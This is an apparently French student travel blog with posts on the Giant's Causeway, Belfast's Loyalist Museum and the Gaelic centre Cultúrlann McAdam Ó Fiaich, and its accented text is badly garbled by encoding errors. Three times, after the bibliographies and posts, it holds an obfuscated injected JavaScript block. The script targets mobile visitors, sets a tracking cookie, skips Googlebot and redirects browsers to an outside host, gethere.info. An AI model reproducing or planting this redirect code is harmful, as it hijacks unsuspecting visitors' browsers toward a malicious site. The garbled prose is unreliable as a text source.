Elle prit tout son temps A� mettre en valeur la grandeur et la force de Finn, en indiquant A� Benandonner les A�normes rochers qua��il A�tait capable de lancer, la nourriture dure qua��il adorait manger alors qua��elle cassait les dents au gA�ant A�cossais. Et finalement, Oonagh lui prA�senta Finn dA�guisA� en bA�bA�. Benandonner fA�t effrayA� en voyant le bA�bA� car il imaginait la taille de son pA?re, son ennemi. Il prit la fuite et dA�truit dans son passage la chaussA�e des gA�ants pour A�viter que son ennemi ne vienne le dA�fier en Ecosse.

Il ne resta que le dA�but du passage des deux cA?tA�s, la��un en Irlande qui devint la chaussA�e des gA�ants et la��un en Ecosse qui devint la grotte de Fingal sur la��A�le de Staffa.

Visitor centre

Avant d’arriver A� la ChaussA�e des GA�ants, il faut entrer dans le centre touristique dA�diA� au lieu. EntiA?rement remis A� neuf depuis un incendie, ce centre a A�tA� amA�nagA� afin de s’intA�grer au mieux A� son environnement, en effet son toit est recouvert de verdure et ses parois ressemblent aux colonnes de basalte.
A� l’intA�rieur, une partie du centre propose rafraA�chissements et souvenirs. Une autre partie du centre prA�sente la ChaussA�e des GA�ants, sa formation, sa lA�gende, ainsi que diverses activitA�s interactives afin de se familiariser au lieu.

RenomA�e

La ChaussA�e des GA�ants fait parti du patrimoine mondial de l’UNESCO et est entretenue par le National Trust, qui s’occupe de la conservation et de la valorisation de sites et da��autres monuments se trouvant notamment en Irlande du Nord. Ce prestigieux site, de part son attrait gA�ologique, est A�galement classA� sous d’autres appellations, comme par exemple sous l’ « Areas of Special Scientific Interest (ASSIs) » ou encore comme rA�serve naturelle.

ExpA�rience personnelle

AprA?s avoir visitA� le centre touristique, nous avons rA�cupA�rA� des audio-guides afin de pouvoir avoir des informations tout au long de notre visite.
Nous avons longA� la cA?te du « Portnaboe » jusqu’au « Port Noffer » A� travers un vent tempA�tueux. Le docteure Jennifer McKinley du dA�partement de GA�ologie A� l’UniversitA� de Queen’s nous accompagnait. En chemin nous nous sommes arrA?tA�s A� diffA�rents endroits, oA? elle nous donnait des informations sur la gA�ologie des lieux.
ArrivA�s A� la ChaussA�e des GA�ants, aprA?s avoir eu de la grA?le et de la pluie, nous avons pu profitA� du lieu, prendre des photos, le tout sous le soleil irlandais. Malheureusement, la chaussA�e principale A�tait fermA�e due aux conditions mA�tA�orologiques changeantes.

index

Notre groupe en haut des colonnes de basalte, Sophie Compagnon, 02.03.16, ChaussA�e des gA�ants

Bibliographie

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au Loyalist Museum a�� Andy Tyrie Interpretive Centre

Par Emilie Guibert et Valentina Ferreira GutiA�rrez

AprA?s avoir passA� une partie de notre sA�jour A� dA�couvrir plusieurs facettes de Belfast, nous avons eu la��opportunitA� da��en explorer une nouvelle, notamment le quartier protestant de East Belfast. Robert, notre chauffeur de bus nous a dA�posA�s devant le A�Loyalist Museum, un musA�e administrA� bA�nA�volement par plusieurs personnes ayant vA�cu la pA�riode des Troubles. Deux da��entre elles nous ont proposA� une visite en deux parties, la premiA?re comprenant un walking tour dans le quartier de East Belfast, et la seconde une visite guidA�e du musA�e. Le soleil na��A�tant pas de la partie, nous avons A�tA� chaleureusement accueilli avec du thA� et du cafA� pour nous rA�chauffer.

Nous avons donc commencA� par une visite guidA�e du quartier da��environ une heure. Un des guides nous a conduits vers les principaux mA�moriaux et murals du quartier en nous explicitant la��aspect symbolique que ces derniers revA?tent pour la communautA� protestante. ParallA?lement, ce dernier nous expliquait le rA?le que les individus reprA�sentA�s sur les fresques ont jouA� lors du conflit, ainsi que le statut des victimes auxquels les mA�moriaux sont dA�diA�s. A�Parfois, il faut avouer que nous avons A�tA� choquA�s par la violence de certaines peintures et slogans. En effet, nous avions la��impression que ces derniers avaient pour but de promouvoir les diffA�rents groupes paramilitaires (notamment la��UYM, UDA, UFF*), ce qui nous a semblA� paradoxal A�tant donnA� le processus de paix initiA� en 1998. A�a�?For as long as one hundred of us remain alive, we shall never in anyway consent to submit to the Irish for ita��s (a��) UDA/UFFa�?. Ces propos figurant sur une des fresques les plus cA�lA?bres du quartier illustre bien la��atmosphA?re de violence encore patente en ce lieu.

Tout au long de la visite, nous avons remarquA� que notre guide utilisait souvent le pronom personnel a�?nousa�? lorsqua��il nous racontait la��histoire du quartier, ce qui peut nous laisser penser que ce dernier a A�tA� impliquA� de maniA?re partisane dans le conflit. Sans vraiment nous transmettre son expA�rience personnelle et son vA�cu, nous pouvions sentir dans ses dires un manque de neutralitA� et da��objectivitA�. Toutefois, ayant entrevu ce que le musA�e contenait, nous pouvions nous attendre A� ce genre de discours plus ou moins partial. MalgrA� cela, nous avons trouvA� cette visite trA?s intA�ressante et complA�mentaire A� ce que nous avons appris auparavant A� propos de Belfast. En effet, nous avions dA�jA� visitA� le quartier protestant de Shankill, mais uniquement A� travers les yeux da��un guide catholique. Ici, le fait da��A?tre accompagnA� par une personne sa��identifiant A� la cause rA�publicaine nous a permis da��accA�der A� un autre point de vue du conflit.

AprA?s une heure de marche dans le froid de Belfast, nous sommes passA�s A� la deuxiA?me partie du programme, A� savoir la visite du musA�e. Les objets y figurant A�taient tous liA�s A� la pA�riode des Troubles. La��abondance da��armes, da��articles relatant les crimes perpA�trA�s par la��IRA** et les mannequins revA?tant les uniformes militaires de la��UFF et de la��UDA nous ont plongA�s de maniA?re indirecte dans la��atmosphA?re violente du conflit.

Tout au long de notre visite, nous avons parfois eu la��impression da��assister A� une sorte de a�?performance identitairea�? de la part de nos deux guides, comme si ces derniers tentaient de promouvoir la cause loyaliste auprA?s des visiteurs. MalgrA� cela, connaA�tre les deux versions du conflit nous a permis da��avoir une vision plus globale des Troubles. GrA?ce A� toutes les informations que nous avons assimilA�es A� travers nos diverses expA�riences, nous pouvons maintenant adopter une pensA�e plus critique et objective du conflit ayant sA�vit A� Belfast. Au cours de notre voyage, divers points de vue nous ont A�tA� transmis. La��hA�tA�rogA�nA�itA� de ces derniers nous a conduit A� considA�rer la pA�riode des Troubles avec un certain recul. Or, cette distanciation sa��avA?re nA�cessaire dans le cadre da��une analyse neutre et acadA�mique.

*UYM: Ulster Youg Militance / UFF: Real Ulster Freedom Fighters / UDA: Ulster Defense Association

** IRA: Real Irish Republican Army

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Une visite au centre gaA�lique CultA?rlann McAdam A� Fiaich

Par Laetitia Valentin et Christina Zholdokova

Mardi 1er mars 2016, aux alentours de midi, nous venions tout juste de terminer la visite en Black Cab et nous avons A�tA� dA�posA�s par ceux-ci devant le centre gaA�lique CultA?rlann McAdam A� Fiaich sur Falls Road.

Ce centre culturel est installA� dans une ancienne A�glise presbytA�rienne A� laquelle une nouvelle aile a A�tA� rattachA�e pour A�tablir une galerie da��art. Nous avons da��abord eu le plaisir de manger au cafA� du centre se trouvant dans le hall da��entA�e au rez-de-chaussA�e. Nous avons A�tA� surpris de recevoir un menu bilingue gaA�lique da��un cA?tA�, anglais de la��autre. En fait, le centre cherche A� faire perdurer la culture irlandaise principalement par le biais de la langue gaA�lique. Pour ce faire, il organise des sA�ances de thA�A?tre, offre la possibilitA� de prendre des cours, soit da��initiation, soit de perfectionnement de la langue gaA�lique, vend des livres autours de la culture irlandaise tant en gaA�lique qua��en anglais. Il propose A�galement des bijoux et da��autres petits articles en lien avec la culture irlandaise et organise des expositions de tableaux ayant pour thA?me les paysages da��Irlande.

Nous avons eu droit A� une confA�rence de la part da��un membre du CultA?lann McAdam A� Fiaich nous expliquant les butes de ce centre. Ils affirment A?tre ouvert A� tous, da��ailleurs, ils invitent A�galement les protestants A� venir voir les spectacles. Leurs objectifs sont donc purement culturels. Cela dit, nous avons tout de mA?me appris durant cette confA�rence qua��un clivage langagier et culturel persiste entre catholiques et protestants. En effet, les enfants catholiques apprennent le gaA�lique A� la��A�cole alors que les enfants protestants na��apprennent que la��anglais et en raison de ce clivage, il est da��autant plus difficile da��attirer des Unionistes dans un centre qui prA?ne les valeurs irlandaises. MalgrA� cette sA�paration persistante entre les deux cultures, un pas de plus vers la paix et la��ouverture A� la culture irlandaise est effectuA� par le centre.

Nous avons A�galement reA�u un petit dA�pliant traduisant de la��anglais au gaA�lique les expressions de tous les jours les plus courantes (A� voir ci-dessous)

Fun facts:

– AprA?s les rA�novations apportA�es en 2011 A� l’ancienne A�glise presbytA�rienne abritant le centre de culture CultA?rlann McAdam A� Fiaich, une galerie d’art sous le nom de Gerard Dillon est ouverte.

– Seule Marie Louise Gormley, artiste crA�ant des images en feutre, assemblA�es A� la machine A� coudre A� partir de soies teintes A� la main et de fils A� broder, est reprA�sentA�e A� la galerie d’art pour le moment.

– La galerie n’est pas seulement un lieu d’exposition, mais A�galement d’achat, A�tant donnA� que des prix figurent sur une partie des A�uvres, permettant un soutien aux artistes locaux.

– Un espace comportant des panneaux tactiles interactifs est prA�sent dans cette nouvelle aile du centre et permet d’acquA�rir des connaissances sur la toponymie des lieux, la poA�sie, la littA�rature, le langage, l’histoire, ainsi que d’autres aspects de la culture irlandaise.

– La collection de livres en vente dans la boutique du rez-de-chaussA�e a longtemps voyagA� de librairie en librairie, avant de finalement A?tre A�tablie de maniA?re permanente au centre CultA?rlann McAdam A� Fiaich. Cette librairie est dite la plus complA?te et diversifiA�e d’Irlande du Nord, regroupant des ouvrages traitant uniquement de la culture et de la vie irlandaises.

– De petits concerts de musique irlandaise jouA�e par des artistes locaux sont organisA�s au sein du restaurant situA� en face de la boutique, au rez-de-chaussA�e.

– Les activitA�s proposA�es par le centre CultA?rlann McAdam A� Fiaich comportent mA?me des cours de bodhran, un instrument de percussion utilisA� dans la musique irlandaise, dA�couvert lors de ce qu’on appelle la « RA�volution Celtique » des annA�es 1960, ne servant auparavant que d’objet rituel lors de rites religieux.

DA�pliant traduction anglais – gaA�lique

 

Bibliographie

Article:
CultA?rlann McAdam A� Fiach (2004-2016)[En ligne] URL: http://www.culturlann.ie/en/, consultA� le 29 mars 2016.

Fun facts:
1) CultA?rlann McAdam A� Fiach (2004-2016) [En ligne] URL: http://www.culturlann.ie/en/
ConsultA� le 15 avril 2016.
2) Visit Belfast: The Official Visitor Website [En ligne] URL:
http://visitbelfast.com/things-to-do/member/culturlann-mcadam-o-fiaich
ConsultA� le 15 avril 2016.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}